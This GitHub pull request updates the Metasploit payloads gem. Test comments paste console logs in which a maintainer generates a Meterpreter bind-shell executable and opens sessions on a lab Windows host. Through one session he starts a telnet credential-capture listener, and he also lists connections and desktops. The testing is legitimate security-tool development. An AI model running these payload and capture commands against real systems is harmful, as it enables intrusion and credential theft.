Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update metasploit-payloads gem to 2.0.108 #17516

Merged
merged 1 commit into from
Jan 20, 2023
Merged

Update metasploit-payloads gem to 2.0.108 #17516

merged 1 commit into from
Jan 20, 2023

Conversation

zeroSteiner
Copy link
Contributor

@gwillcox-r7 gwillcox-r7 self-assigned this Jan 20, 2023
@gwillcox-r7
Copy link
Contributor

Picking this up since 2/3 of these PRs I tested myself already, so it should be easier to get this landed.

@gwillcox-r7
Copy link
Contributor

First test passing:

msf6 payload(windows/x64/meterpreter/bind_tcp) > generate -f exe -o test-bind-updated.exe
[*] Writing 7168 bytes to test-bind-updated.exe...
msf6 payload(windows/x64/meterpreter/bind_tcp) > run
[-] Unknown command: run
msf6 payload(windows/x64/meterpreter/bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/meterpreter/bind_tcp) > 
[*] Started bind TCP handler against 192.168.153.132:4444
[*] Sending stage (200774 bytes) to 192.168.153.132
[*] Meterpreter session 1 opened (192.168.153.128:46065 -> 192.168.153.132:4444) at 2023-01-20 13:00:06 -0600

msf6 payload(windows/x64/meterpreter/bind_tcp) > use auxiliary/server/capture/telnet
msf6 auxiliary(server/capture/telnet) > set ListenerCom 1
[-] Unknown datastore option: ListenerCom. Did you mean ListenerComm?
msf6 auxiliary(server/capture/telnet) > set ListenerComm 1
ListenerComm => 1
msf6 auxiliary(server/capture/telnet) > set SRVHOST 192.168.153.132
SRVHOST => 192.168.153.132
msf6 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/capture/telnet) > 
[*] Started service listener on 192.168.153.132:23 via the meterpreter on session 1
[*] Server started.

msf6 auxiliary(server/capture/telnet) > set SRVHOST ::1
SRVHOST => ::1
msf6 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/capture/telnet) > 
[*] Started service listener on [::1]:23 via the meterpreter on session 1
[*] Server started.

msf6 auxiliary(server/capture/telnet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > netstat -a

Connection list
===============

    Proto  Local address                    Remote address   State        User  Inode  PID/Program name
    -----  -------------                    --------------   -----        ----  -----  ----------------
    tcp    0.0.0.0:135                      0.0.0.0:*        LISTEN       0     0      584/svchost.exe
    tcp    0.0.0.0:445                      0.0.0.0:*        LISTEN       0     0      4/System
    tcp    0.0.0.0:5040                     0.0.0.0:*        LISTEN       0     0      4720/svchost.exe
    tcp    0.0.0.0:7680                     0.0.0.0:*        LISTEN       0     0      1352/svchost.exe
    tcp    0.0.0.0:49664                    0.0.0.0:*        LISTEN       0     0      856/lsass.exe
    tcp    0.0.0.0:49665                    0.0.0.0:*        LISTEN       0     0      688/wininit.exe
    tcp    0.0.0.0:49666                    0.0.0.0:*        LISTEN       0     0      1428/svchost.exe
    tcp    0.0.0.0:49667                    0.0.0.0:*        LISTEN       0     0      1768/svchost.exe
    tcp    0.0.0.0:49668                    0.0.0.0:*        LISTEN       0     0      2604/spoolsv.exe
    tcp    0.0.0.0:49673                    0.0.0.0:*        LISTEN       0     0      832/services.exe
    tcp    192.168.153.132:23               0.0.0.0:*        LISTEN       0     0      696/updated_bind_test.exe
    tcp    192.168.153.132:139              0.0.0.0:*        LISTEN       0     0      4/System
    tcp    192.168.153.132:4444             192.168.153.128  ESTABLISHED  0     0      696/updated_bind_test.exe
                                            :46065
    tcp    192.168.153.132:9090             0.0.0.0:*        LISTEN       0     0      696/updated_bind_test.exe
    tcp    192.168.153.132:56334            104.43.200.36:4  TIME_WAIT    0     0      0/[System Process]
                                            43
    tcp    192.168.153.132:56339            20.7.1.246:443   ESTABLISHED  0     0      3164/svchost.exe
    tcp    192.168.153.132:56367            184.28.41.37:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56383            20.54.24.169:44  TIME_WAIT    0     0      0/[System Process]
                                            3
    tcp    192.168.153.132:56394            23.207.24.151:4  ESTABLISHED  0     0      1352/svchost.exe
                                            43
    tcp    192.168.153.132:56399            51.91.79.17:443  CLOSE_WAIT   0     0      8056/brave.exe
    tcp    192.168.153.132:56400            72.21.81.240:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56401            72.21.81.240:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56403            72.21.81.240:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56406            51.104.164.114:  ESTABLISHED  0     0      1352/svchost.exe
                                            443
    tcp    192.168.153.132:56407            51.104.162.168:  TIME_WAIT    0     0      0/[System Process]
                                            443
    tcp    192.168.153.132:56408            51.104.162.168:  TIME_WAIT    0     0      0/[System Process]
                                            443
    tcp    192.168.153.132:56409            51.104.162.50:4  ESTABLISHED  0     0      1352/svchost.exe
                                            43
    tcp    192.168.153.132:56410            23.207.18.123:4  ESTABLISHED  0     0      1352/svchost.exe
                                            43
    tcp    192.168.153.132:56411            23.207.24.151:4  ESTABLISHED  0     0      1352/svchost.exe
                                            43
    tcp    192.168.153.132:56412            208.111.186.0:8  TIME_WAIT    0     0      0/[System Process]
                                            0
    tcp    192.168.153.132:56413            52.242.97.97:44  TIME_WAIT    0     0      0/[System Process]
                                            3
    tcp    192.168.153.132:56414            184.28.41.68:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56415            184.28.41.80:80  TIME_WAIT    0     0      0/[System Process]
    tcp    192.168.153.132:56416            51.104.162.168:  ESTABLISHED  0     0      1352/svchost.exe
                                            443
    tcp    192.168.153.132:56417            20.50.80.210:44  TIME_WAIT    0     0      0/[System Process]
                                            3
    tcp    192.168.153.132:56419            20.50.80.210:44  TIME_WAIT    0     0      0/[System Process]
                                            3
    tcp    192.168.153.132:56420            20.7.2.167:443   ESTABLISHED  0     0      3164/svchost.exe
    tcp    192.168.153.132:56424            184.28.29.162:4  ESTABLISHED  0     0      6280/Widgets.exe
                                            43
    tcp    192.168.153.132:56425            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56426            13.107.42.254:4  ESTABLISHED  0     0      6236/SearchHost.exe
                                            43
    tcp    192.168.153.132:56427            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56428            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56429            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56430            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56431            204.79.197.200:  ESTABLISHED  0     0      6236/SearchHost.exe
                                            443
    tcp    192.168.153.132:56432            72.21.91.29:80   ESTABLISHED  0     0      6236/SearchHost.exe
    tcp    192.168.153.132:56433            184.28.29.162:4  ESTABLISHED  0     0      5372/explorer.exe
                                            43
    tcp    192.168.153.132:56434            204.79.197.203:  ESTABLISHED  0     0      6280/Widgets.exe
                                            443
    tcp    192.168.153.132:56437            13.107.42.16:44  TIME_WAIT    0     0      0/[System Process]
                                            3
    tcp    192.168.153.132:56438            204.79.197.203:  TIME_WAIT    0     0      0/[System Process]
                                            443
    tcp    192.168.153.132:56440            72.21.81.200:80  ESTABLISHED  0     0      17752/svchost.exe
    tcp    192.168.153.132:56441            72.21.81.200:80  ESTABLISHED  0     0      17752/svchost.exe
    tcp    192.168.153.132:56442            204.79.197.239:  TIME_WAIT    0     0      0/[System Process]
                                            443
    tcp6   :::135                           :::*             LISTEN       0     0      584/svchost.exe
    tcp6   :::445                           :::*             LISTEN       0     0      4/System
    tcp6   :::7680                          :::*             LISTEN       0     0      1352/svchost.exe
    tcp6   :::49664                         :::*             LISTEN       0     0      856/lsass.exe
    tcp6   :::49665                         :::*             LISTEN       0     0      688/wininit.exe
    tcp6   :::49666                         :::*             LISTEN       0     0      1428/svchost.exe
    tcp6   :::49667                         :::*             LISTEN       0     0      1768/svchost.exe
    tcp6   :::49668                         :::*             LISTEN       0     0      2604/spoolsv.exe
    tcp6   :::49673                         :::*             LISTEN       0     0      832/services.exe
    tcp6   ::1:23                           :::*             LISTEN       0     0      696/updated_bind_test.exe
    tcp6   ::1:9090                         :::*             LISTEN       0     0      696/updated_bind_test.exe
    udp    0.0.0.0:123                      0.0.0.0:*                     0     0      8292/svchost.exe
    udp    0.0.0.0:5050                     0.0.0.0:*                     0     0      4720/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                     0     0      5460/msedge.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                     0     0      1656/svchost.exe
    udp    0.0.0.0:5353                     0.0.0.0:*                     0     0      5460/msedge.exe
    udp    0.0.0.0:5355                     0.0.0.0:*                     0     0      1656/svchost.exe
    udp    0.0.0.0:60507                    0.0.0.0:*                     0     0      1656/svchost.exe
    udp    0.0.0.0:62226                    0.0.0.0:*                     0     0      1656/svchost.exe
    udp    127.0.0.1:1900                   0.0.0.0:*                     0     0      4196/svchost.exe
    udp    127.0.0.1:54973                  0.0.0.0:*                     0     0      4196/svchost.exe
    udp    127.0.0.1:63242                  0.0.0.0:*                     0     0      2216/svchost.exe
    udp    192.168.153.132:137              0.0.0.0:*                     0     0      4/System
    udp    192.168.153.132:138              0.0.0.0:*                     0     0      4/System
    udp    192.168.153.132:1900             0.0.0.0:*                     0     0      4196/svchost.exe
    udp    192.168.153.132:54972            0.0.0.0:*                     0     0      4196/svchost.exe
    udp6   :::123                           :::*                          0     0      8292/svchost.exe
    udp6   :::5353                          :::*                          0     0      1656/svchost.exe
    udp6   :::5353                          :::*                          0     0      5460/msedge.exe
    udp6   :::5355                          :::*                          0     0      1656/svchost.exe
    udp6   :::60507                         :::*                          0     0      1656/svchost.exe
    udp6   :::62226                         :::*                          0     0      1656/svchost.exe
    udp6   ::1:1900                         :::*                          0     0      4196/svchost.exe
    udp6   ::1:54971                        :::*                          0     0      4196/svchost.exe
    udp6   fe80::7db2:381a:15e0:1a01:1900   :::*                          0     0      4196/svchost.exe
    udp6   fe80::7db2:381a:15e0:1a01:54970  :::*                          0     0      4196/svchost.exe

meterpreter >

@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Jan 20, 2023
edited
Loading

rapid7/metasploit-payloads#602 has already been tested over at #17340. Will retest it as part of landing that PR. Atm it seems like we are still binding to 0.0.0.0:2222 with just this PR alone and using the portfwd command.

@gwillcox-r7
Copy link
Contributor

The enum_desktop addition seems to be working well:

msf6 payload(python/meterpreter/bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                        Information                          Connection
  --  ----  ----                        -----------                          ----------
  4         meterpreter python/windows  NT AUTHORITY\SYSTEM @ Windows-11-Te  192.168.153.128:38149 -> 192.168.15
                                        st                                   3.132:4444 (192.168.153.132)

msf6 payload(python/meterpreter/bind_tcp) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > enumdesktops 
Enumerating all accessible desktops

Desktops
========

    Session  Station              Name
    -------  -------              ----
    1        WinSta0              Default
    1        WinSta0              Disconnect
    1        WinSta0              Winlogon
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x2D8C
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x27F4
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x274
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x2324
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x1554
    1        Service-0x0-11a04c$  sbox_alternate_desktop_0x1F80

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.153.132 - Meterpreter session 4 closed.  Reason: User exit
msf6 payload(python/meterpreter/bind_tcp) > to_handler
[*] Payload Handler Started as Job 7
msf6 payload(python/meterpreter/bind_tcp) > 
[*] Started bind TCP handler against 192.168.153.132:4444
[*] Sending stage (24380 bytes) to 192.168.153.132
[*] Meterpreter session 5 opened (192.168.153.128:44705 -> 192.168.153.132:4444) at 2023-01-20 13:42:10 -0600

msf6 payload(python/meterpreter/bind_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > enumdesktops 
Enumerating all accessible desktops

Desktops
========

    Session  Station           Name
    -------  -------           ----
    0        WinSta0           Default
    0        WinSta0           Disconnect
    0        WinSta0           Winlogon
    0        msswindowstation  mssrestricteddesk

meterpreter > getprivs
[-] The "getprivs" command is not supported by this Meterpreter type (python/windows)
meterpreter > background
[*] Backgrounding session 5...
smsf6 payload(python/meterpreter/bind_tcp) > sessions 

Active sessions
===============

  Id  Name  Type                        Information                          Connection
  --  ----  ----                        -----------                          ----------
  5         meterpreter python/windows  NT AUTHORITY\SYSTEM @ Windows-11-Te  192.168.153.128:44705 -> 192.168.15
                                        st                                   3.132:4444 (192.168.153.132)

msf6 payload(python/meterpreter/bind_tcp) >

@gwillcox-r7
Copy link
Contributor

Everything looks on my side, will get this landed now.

@gwillcox-r7 gwillcox-r7 mentioned this pull request Jan 20, 2023
Merged
5 tasks
@gwillcox-r7
Copy link
Contributor

Release Notes

The version of metasploit-payloads has been bumped up to add support for dual IPv4/IPv6 stacks to Python Meterpreter, add support for enumerating desktops with the enumdesktops command to Python Meterpreter, and also add support for binding to the specified localhost to compiled versions of Meterpreter.

@gwillcox-r7 gwillcox-r7 merged commit e537816 into rapid7:master Jan 20, 2023
@gwillcox-r7 gwillcox-r7 mentioned this pull request Jan 21, 2023
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@gwillcox-r7 gwillcox-r7 gwillcox-r7 approved these changes

Assignees

@gwillcox-r7 gwillcox-r7

Labels
bug enhancement rn-fix release notes fix
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@zeroSteiner @gwillcox-r7